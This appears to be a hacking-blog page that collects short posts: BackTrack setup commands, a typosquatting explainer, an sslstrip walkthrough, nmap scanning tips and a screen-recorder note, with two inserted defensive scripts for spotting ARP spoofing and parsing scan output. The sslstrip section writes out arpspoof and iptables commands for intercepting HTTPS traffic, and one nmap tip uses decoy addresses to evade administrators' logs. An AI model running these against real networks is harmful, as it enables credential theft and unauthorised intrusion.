Codeearl - Security Info
Hacking Security, Exploit Database, SQL Injection, Shell, Vulnerability Reports, Remote Exploits, Remote Control, Local Exploits, Security Articles, Security News, Tutorials And More Hacking
History of the Press
#///////////////////////////////////////////////////////////////// #// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - #// Regards : c0d334rl | Qye #// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - #// GENERATED ON : 2012-12-01 | 00:04 PM #/////////////////////////////////////////////////////////////////
What to do after installing BackTrack
1. apt-get update
2. apt-get upgrade
3. apt-get install update-manager
4. apt-get install synaptic
* Ubuntu Software Center location: Applications => Ubuntu Software Center
5. apt-get install software-center
6. sudo apt-get install openoffice.org => for open office
7. Install Ubuntu Tweak
* add-apt-repository ppa:ubuntu-tweak-testing/ppa && sudo apt-get update
* sudo apt-get install ubuntu-tweak
8. Install the AMD driver
* wget -c http://www2.ati.com/drivers/linux/amd-driver-installer-12-1-x86.x86_64.run => download to home folder
* chmod +x amd-driver-installer-12-1-x86.x86_64.run => change permission
* ./amd-driver-installer-12-1-x86.x86_64.run => run or setup
URL Hijacking, or Typosquatting
Typosquatting, also called URL hijacking, is a form of cybersquatting, and possibly brandjacking, that relies on mistakes such as typographical errors made by Internet users when entering a website address into a web browser. Should a user accidentally enter an incorrect website address, they may be led to an alternative site owned by a cybersquatter.
There are several different reasons for typosquatters to buy a typo domain:
- To try to sell the typo domain back to the brand owner
- To "park" the typo domain and earn pay-per-click revenue from direct-navigation misspellings of the intended domain
- To redirect the typo traffic to a competitor
- To redirect the typo traffic back to the brand itself, but through an affiliate link, thereby earning commissions from the brand owner's affiliate program. These "affiliate typo domains" are among the most financially damaging schemes, because they siphon profit from the legitimate brand for traffic and customers that the brand would have received anyway had the typo domain not existed.
- As a phishing scheme that imitates the brand's site while intercepting the passwords that visitors unsuspectingly enter
- To install drive-by malware or revenue-generating adware on visitors' devices
- To harvest misaddressed e-mail messages mistakenly sent to the typo domain
- To block malicious use of the typo domain by others
Sslstrip
This tool provides a demonstration of the HTTPS stripping attack. It hijacks HTTP traffic on a network, watches for HTTPS links and redirects, then maps those links into either look-alike HTTP links or homograph-similar HTTPS links. It also supports modes for supplying a favicon that looks like a lock icon, selective logging, and session denial.
All right, what you need now is sslstrip-0.9.tar.gz, which you can download here.
After downloading, extract the file with the command tar zxvf sslstrip-0.9.tar.gz, as shown in the image below.
(Image: extraction progress for sslstrip-0.9.tar.gz)
Then change into the extracted folder with the following command:
code@earl:~# cd sslstrip-0.9
To install, make sure Python is installed on your operating system, then run the following command:
code@earl:~/sslstrip-0.9# python ./setup.py install
(Image: install output)
Running sslstrip
- echo "1" > /proc/sys/net/ipv4/ip_forward
- iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort> "Set up iptables to redirect HTTP traffic to sslstrip"
- sslstrip.py -l <listenPort> "Run sslstrip"
- arpspoof -i <interface> -t <targetIP> <gatewayIP> "Run arpspoof to convince the network that it should send its traffic to you"
Good luck, and spread your own wings in the air.
regard : code@earl:~# A.k.a c0d334rl /codeearl
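The arpspoof step above leaves a visible trace on the client: the gateway's IP ends up mapped to the same hardware address as another host. The following detection sketch is an added example, not part of the original post or of sslstrip; the function names and the sample ARP table are constructed, and it assumes the spoofing host's own IP is also present in the client's ARP cache.

```shell
#!/bin/sh
# Added example: spot the ARP-cache footprint of the arpspoof step on a client.

# Constructed sample in /proc/net/arp format (not taken from a real host).
# 192.168.1.1 is assumed to be the gateway, 192.168.1.23 the spoofing host.
sample_arp_table() {
cat <<'EOF'
IP address       HW type     Flags       HW address            Mask     Device
192.168.1.1      0x1         0x2         00:11:22:33:44:55     *        eth0
192.168.1.23     0x1         0x2         00:11:22:33:44:55     *        eth0
192.168.1.40     0x1         0x2         A4:5E:60:AA:BB:CC     *        eth0
192.168.1.77     0x1         0x0         00:00:00:00:00:00     *        eth0
EOF
}

# Read an ARP table on stdin and print "mac ip1,ip2,..." for every hardware
# address that answers for more than one IP. Incomplete entries (all-zero
# MAC) are skipped.
find_shared_macs() {
    awk 'NR > 1 && $4 != "00:00:00:00:00:00" {
             mac = tolower($4)
             if (mac in ips) { ips[mac] = ips[mac] "," $1 } else { ips[mac] = $1 }
             count[mac]++
         }
         END { for (m in count) if (count[m] > 1) print m, ips[m] }' | sort
}

# Succeed (exit 0) when the given gateway IP shares its MAC with another IP.
gateway_mac_is_shared() {
    find_shared_macs | awk -v gw="$1" '
        { n = split($2, ip, ","); for (i = 1; i <= n; i++) if (ip[i] == gw) hit = 1 }
        END { exit (hit ? 0 : 1) }'
}

# On a live Linux host: gateway_mac_is_shared 192.168.1.1 < /proc/net/arp
if sample_arp_table | gateway_mac_is_shared 192.168.1.1; then
    echo "ALERT: gateway MAC shared: $(sample_arp_table | find_shared_macs)"
fi
```

A shared MAC is a heuristic, not proof: a router with several addresses on one interface or proxy ARP produces the same pattern, so compare against the gateway's known hardware address before acting.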
Nmap Cool Scanning Technique
1) Get info about remote host ports and OS detection
Code: nmap -sS -P0 -sV -O <target>
Where < target > may be a single IP, a hostname or a subnet
-sS TCP SYN scanning (also known as half-open, or stealth scanning)
-P0 option allows you to switch off ICMP pings.
-sV option enables version detection
-O flag attempts to identify the remote operating system
Other options:
-A option enables both OS fingerprinting and version detection
-v use -v twice for more verbosity.
Code: nmap -sS -P0 -A -v <target>
2) Get list of servers with a specific port open
Code: nmap -sT -p 80 -oG - 192.168.1.* | grep open
Change the -p argument for the port number. See “man nmap” for different ways to specify address ranges.
3) Find all active IP addresses in a network
Code: nmap -sP 192.168.0.*
There are several other options. This one is plain and simple.
Another option is:
Code: nmap -sP 192.168.0.0/24
for specific subnets
4) Ping a range of IP addresses
Code: nmap -sP 192.168.1.100-254
nmap accepts a wide variety of addressing notation, multiple targets/ranges, etc.
5) Find unused IPs on a given subnet
Code: nmap -T4 -sP 192.168.2.0/24 && egrep "00:00:00:00:00:00" /proc/net/arp
6) Scan for the Conficker virus on your LAN etc.
Code: nmap -PN -T4 -p139,445 -n -v --script=smb-check-vulns --script-args safe=1 192.168.0.1-254
Replace 192.168.0.1-254 with the IPs you want to check.
7) Scan Network for Rogue APs.
Code: nmap -A -p1-85,113,443,8080-8100 -T4 --min-hostgroup 50 --max-rtt-timeout 2000 --initial-rtt-timeout 300 --max-retries 3 --host-timeout 20m --max-scan-delay 1000 -oA wapscan 10.0.0.0/8
I’ve used this scan to successfully find many rogue APs on a very, very large network.
8) Use a decoy while scanning ports to avoid getting caught by the sys admin
Code: nmap -sS 192.168.0.10 -D 192.168.0.2
Scan for open ports on the target device/computer (192.168.0.10) while setting up a decoy address (192.168.0.2). This will show the decoy IP address instead of your IP in the target's security logs. The decoy address needs to be alive. Check the target's security log at /var/log/secure to make sure it worked.
9) List of reverse DNS records for a subnet
Code: nmap -R -sL 209.85.229.99/27 | awk '{if($3=="not")print"("$2") no PTR";else print$3" is "$2}' | grep '('
This command uses nmap to perform reverse DNS lookups on a subnet. It produces a list of IP addresses with the corresponding PTR record for a given subnet. You can enter the subnet in CIDR notation (i.e. /24 for a Class C). You could add "--dns-servers x.x.x.x" after the "-sL" if you need the lookups to be performed on a specific DNS server. On some installations nmap needs sudo, I believe. Also, I hope awk is standard on most distros.
10) How Many Linux And Windows Devices Are On Your Network
Code: nmap -F -O 192.168.0.1-255 | grep "Running: " > /tmp/os; echo "$(cat /tmp/os | grep Linux | wc -l) Linux device(s)"; echo "$(cat /tmp/os | grep Windows | wc -l) Window(s) devices"
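Item 2 filters grepable output with a plain grep for "open", which also matches hostnames containing that string and hosts where a different port is the open one. The following is an added example, not from the original post, that reads the Ports field of `-oG -` output entry by entry for an asset inventory; the function names and the sample scan output are constructed.

```shell
#!/bin/sh
# Added example: read nmap grepable output (-oG -) field by field.

# Constructed sample of `nmap -p 80,8080 -oG -` output (not a real scan).
sample_grepable() {
    printf '# Nmap scan initiated (constructed sample)\n'
    printf 'Host: 192.168.1.1 ()\tStatus: Up\n'
    printf 'Host: 192.168.1.1 ()\tPorts: 80/open/tcp//http///, 8080/closed/tcp//http-proxy///\n'
    printf 'Host: 192.168.1.5 (printer.lan)\tPorts: 80/closed/tcp//http///, 8080/open/tcp//http-proxy///\n'
    printf 'Host: 192.168.1.9 (openwrt.lan)\tPorts: 80/filtered/tcp//http///, 8080/filtered/tcp//http-proxy///\n'
}

# open_hosts PORT: read grepable output on stdin and print the IP of every
# host whose entry for PORT is in state exactly "open".
open_hosts() {
    awk -F'\t' -v port="$1" '
        /^Host: / {
            split($1, h, " ")                  # h[2] is the IP address
            for (f = 2; f <= NF; f++) {
                if ($f !~ /^Ports: /) continue
                n = split(substr($f, 8), entry, ", ")
                for (i = 1; i <= n; i++) {
                    split(entry[i], p, "/")    # port/state/protocol/...
                    if (p[1] == port && p[2] == "open") print h[2]
                }
            }
        }'
}

# Number of lines the plain grep from item 2 would report on the same input.
naive_match_count() {
    grep -c open
}

echo "grep open matches: $(sample_grepable | naive_match_count) lines"
echo "port 80 open on:   $(sample_grepable | open_hosts 80)"
```

On the sample, the plain grep reports three lines while only one host actually has port 80 open.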
Record My Desktop
What is Record My Desktop?
Record My Desktop is a tool that lets us record the activity on the desktop we are currently using.
Once you have installed the program, you should also be able to start it by running the following command in a terminal:
code@earl:~# recordmydesktop
or
Applications > Sound & Video > gtk-recordMyDesktop
To install it, simply type the following command in a terminal:
code@earl:~# apt-get install gtk-recordmydesktop